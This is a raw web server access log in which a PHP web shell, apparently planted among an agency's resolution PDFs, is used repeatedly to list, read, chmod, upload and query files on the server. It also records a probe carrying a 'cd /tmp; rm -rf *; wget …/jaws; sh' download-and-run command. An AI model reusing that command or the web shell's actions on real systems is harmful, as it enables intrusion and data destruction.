47.128.122.225 - - [21/May/2024:00:48:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.122.225 - - [21/May/2024:00:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.122.225 - - [21/May/2024:00:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.122.225 - - [21/May/2024:00:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.122.225 - - [21/May/2024:00:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.122.225 - - [21/May/2024:00:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [21/May/2024:00:48:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/May/2024:00:48:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66826510794084087a689b1c31a1f3ad8.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.117.220 - - [21/May/2024:00:48:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clocale%5Ccs%5CLC_MESSAGES%5C&sort=3a HTTP/1.1" 200 3418
47.128.117.220 - - [21/May/2024:00:48:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.117.220 - - [21/May/2024:00:48:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_mo HTTP/1.1" 200 1034
216.244.66.195 - - [21/May/2024:00:48:28 -0500] "GET /BLA/resoluciones/AUTOS%202017/2739.pdf HTTP/1.1" 200 284417
52.167.144.238 - - [21/May/2024:00:48:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/4138.pdf HTTP/1.1" 304 -
47.128.115.222 - - [21/May/2024:00:48:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccurtiembres%5Cimages&f=page123.swf HTTP/1.1" 200 3030
47.128.115.222 - - [21/May/2024:00:48:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.115.222 - - [21/May/2024:00:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [21/May/2024:00:48:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62840b3333a9e4d5b98f0d30ba0d9434a.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.98.35 - - [21/May/2024:00:48:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CRESOURCE&f=wpm-char.r HTTP/1.1" 200 2984
47.128.98.35 - - [21/May/2024:00:48:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.98.35 - - [21/May/2024:00:48:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.98.35 - - [21/May/2024:00:48:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.98.35 - - [21/May/2024:00:48:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.98.35 - - [21/May/2024:00:48:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.98.35 - - [21/May/2024:00:48:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.98.35 - - [21/May/2024:00:48:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.98.35 - - [21/May/2024:00:48:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.98.35 - - [21/May/2024:00:48:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_r HTTP/1.1" 200 1034
47.128.98.35 - - [21/May/2024:00:48:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
156.59.198.136 - - [21/May/2024:00:48:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&f=snapshot.txt HTTP/1.0" 200 2742
216.244.66.195 - - [21/May/2024:00:48:58 -0500] "GET /BLA/resoluciones/AUTOS%202017/2858.pdf HTTP/1.1" 200 617601
47.128.98.230 - - [21/May/2024:00:49:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=tools&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2003%5C HTTP/1.1" 200 3062
201.245.192.253 - - [21/May/2024:00:49:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.60.116 - - [21/May/2024:00:49:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Cswfupload%5C&f=license.txt HTTP/1.1" 200 2919
216.244.66.195 - - [21/May/2024:00:49:30 -0500] "GET /BLA/resoluciones/AUTOS%202017/3039.pdf HTTP/1.1" 200 313834
66.249.66.20 - - [21/May/2024:00:49:34 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%203%20del%2027%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 910420
47.128.59.226 - - [21/May/2024:00:49:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CCobro+Evaluacion+Certificaci%F3n+Para+La+Deducci%F3n+Por+Inversi%F3n+En+Medio+Ambiente%5C&sort=0a HTTP/1.1" 200 3618
47.128.59.226 - - [21/May/2024:00:49:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.59.226 - - [21/May/2024:00:49:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.59.226 - - [21/May/2024:00:49:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.41.147 - - [21/May/2024:00:49:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=NuestraGente_NuestroHumedal.flv HTTP/1.1" 200 2872
41.237.216.197 - - [21/May/2024:00:49:50 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.128.232.15/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.244.66.195 - - [21/May/2024:00:49:58 -0500] "GET /BLA/resoluciones/AUTOS%202017/3058.pdf HTTP/1.1" 200 290589
172.22.2.4 - - [21/May/2024:00:48:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [21/May/2024:00:50:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=errmsg-utf8.txt HTTP/1.0" 200 2714
201.245.192.253 - - [21/May/2024:00:50:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/May/2024:00:50:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66826510794084087a689b1c31a1f3ad8.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [21/May/2024:00:50:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RESOLUCION%204287%20DE%202007.PDF HTTP/1.1" 200 1272820
47.128.43.30 - - [21/May/2024:00:50:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=DBQbe.class.php HTTP/1.1" 200 17084
201.245.192.253 - - [21/May/2024:00:50:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 35554
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.43.30 - - [21/May/2024:00:50:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [21/May/2024:00:50:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62840b3333a9e4d5b98f0d30ba0d9434a.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.43.72 - - [21/May/2024:00:50:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.43.72 - - [21/May/2024:00:50:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.43.72 - - [21/May/2024:00:50:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.43.72 - - [21/May/2024:00:50:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.43.72 - - [21/May/2024:00:50:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.43.72 - - [21/May/2024:00:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.43.72 - - [21/May/2024:00:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.43.72 - - [21/May/2024:00:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.43.72 - - [21/May/2024:00:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.43.72 - - [21/May/2024:00:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.43.72 - - [21/May/2024:00:50:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Table.class.php HTTP/1.1" 200 23661
47.128.41.139 - - [21/May/2024:00:50:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1697.pdf&ft=html&white=1 HTTP/1.1" 200 1126102
172.22.2.4 - - [21/May/2024:00:49:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57136
216.244.66.195 - - [21/May/2024:00:50:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0365.pdf HTTP/1.1" 200 475118
47.128.43.33 - - [21/May/2024:00:50:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages%5C&f=page71.swf HTTP/1.1" 200 3026
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.43.33 - - [21/May/2024:00:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
172.22.2.4 - - [21/May/2024:00:50:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
47.128.115.254 - - [21/May/2024:00:51:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page79.swf HTTP/1.1" 200 2891
201.245.192.253 - - [21/May/2024:00:51:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [21/May/2024:00:51:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0475.pdf HTTP/1.1" 200 239437
47.128.43.67 - - [21/May/2024:00:51:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cmpp&f=OACI.ZIP HTTP/1.1" 200 2858
47.128.97.124 - - [21/May/2024:00:51:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=search&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5CPOT-2013%5Cexpediente%5C HTTP/1.1" 200 2885
216.244.66.195 - - [21/May/2024:00:51:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1093.pdf HTTP/1.1" 200 364805
47.128.124.115 - - [21/May/2024:00:51:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&sort=3d HTTP/1.1" 200 12128
47.128.124.115 - - [21/May/2024:00:51:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.124.115 - - [21/May/2024:00:51:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.124.115 - - [21/May/2024:00:51:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
216.245.221.92 - - [21/May/2024:00:51:53 -0500] "HEAD / HTTP/1.1" 200 -
47.128.31.95 - - [21/May/2024:00:51:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=C%3A%5CUsers%5CAdministrator%5CDownloads HTTP/1.1" 200 2835
216.244.66.195 - - [21/May/2024:00:52:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1349.pdf HTTP/1.1" 200 576324
156.59.198.135 - - [21/May/2024:00:52:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&f=126PM03-PR28.pdf HTTP/1.0" 200 2748
201.245.192.253 - - [21/May/2024:00:52:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/May/2024:00:52:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66826510794084087a689b1c31a1f3ad8.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.26.61 - - [21/May/2024:00:52:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=search&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cxampp%5C HTTP/1.1" 200 2850
216.244.66.195 - - [21/May/2024:00:52:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0101.pdf HTTP/1.1" 200 240842
47.128.20.136 - - [21/May/2024:00:52:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs&f=gallery.js HTTP/1.1" 200 4820
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.20.136 - - [21/May/2024:00:52:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
201.245.192.253 - - [21/May/2024:00:52:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62840b3333a9e4d5b98f0d30ba0d9434a.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.31.180 - - [21/May/2024:00:52:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Ckmz&f=vallas_otorgadas_may2014.kmz HTTP/1.1" 200 2870
216.244.66.195 - - [21/May/2024:00:52:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0223.pdf HTTP/1.1" 200 253380
47.128.16.93 - - [21/May/2024:00:53:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page7.swf HTTP/1.1" 200 2890
156.59.198.136 - - [21/May/2024:00:53:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&f=126PM03-PR01.pdf HTTP/1.0" 200 2748
216.244.66.195 - - [21/May/2024:00:53:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0319.pdf HTTP/1.1" 200 254159
201.245.192.253 - - [21/May/2024:00:53:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.81 - - [21/May/2024:00:53:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=sql&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cnetwork%5C HTTP/1.1" 200 3080
216.244.66.195 - - [21/May/2024:00:53:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0419.pdf HTTP/1.1" 200 198294
47.128.33.53 - - [21/May/2024:00:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGestion+Documental%5Cdlf%5C&f=sig.gif HTTP/1.1" 200 2896
216.244.66.195 - - [21/May/2024:00:53:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0626.pdf HTTP/1.1" 200 300365
47.128.33.67 - - [21/May/2024:00:53:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Csuelos%5C.vscode&f=.. HTTP/1.1" 200 2862
47.128.120.216 - - [21/May/2024:00:54:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=media-button-2x.png HTTP/1.1" 200 16297
216.244.66.195 - - [21/May/2024:00:54:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0648.pdf HTTP/1.1" 200 265326
47.128.120.216 - - [21/May/2024:00:54:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.120.216 - - [21/May/2024:00:54:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.120.216 - - [21/May/2024:00:54:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.120.216 - - [21/May/2024:00:54:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.120.216 - - [21/May/2024:00:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.120.216 - - [21/May/2024:00:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.120.216 - - [21/May/2024:00:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.120.216 - - [21/May/2024:00:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.120.216 - - [21/May/2024:00:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.120.216 - - [21/May/2024:00:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
201.245.192.253 - - [21/May/2024:00:54:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/May/2024:00:54:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66826510794084087a689b1c31a1f3ad8.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.33.224 - - [21/May/2024:00:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cportalsiaccapacitaciones%5CListas+de+Asistencia+2017&f=Planillas+Asistencia+Publicidad+exterior+visual+y+arbolado+03+11+2017.pdf HTTP/1.1" 200 3124
47.128.33.224 - - [21/May/2024:00:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.33.224 - - [21/May/2024:00:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.33.224 - - [21/May/2024:00:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.33.224 - - [21/May/2024:00:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.33.224 - - [21/May/2024:00:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.33.224 - - [21/May/2024:00:54:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.33.224 - - [21/May/2024:00:54:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.33.224 - - [21/May/2024:00:54:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.33.224 - - [21/May/2024:00:54:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.33.224 - - [21/May/2024:00:54:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
216.244.66.195 - - [21/May/2024:00:54:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0713.pdf HTTP/1.1" 200 290448
47.128.24.243 - - [21/May/2024:00:54:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2003%5C HTTP/1.1" 200 2887
201.245.192.253 - - [21/May/2024:00:54:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62840b3333a9e4d5b98f0d30ba0d9434a.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.127.27 - - [21/May/2024:00:54:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cxampp%5Cxampp%5CFileZillaFTP%5C&sort=0d HTTP/1.1" 200 3869
47.128.127.27 - - [21/May/2024:00:54:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_bat HTTP/1.1" 200 131
47.128.127.27 - - [21/May/2024:00:54:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_dll HTTP/1.1" 200 1034
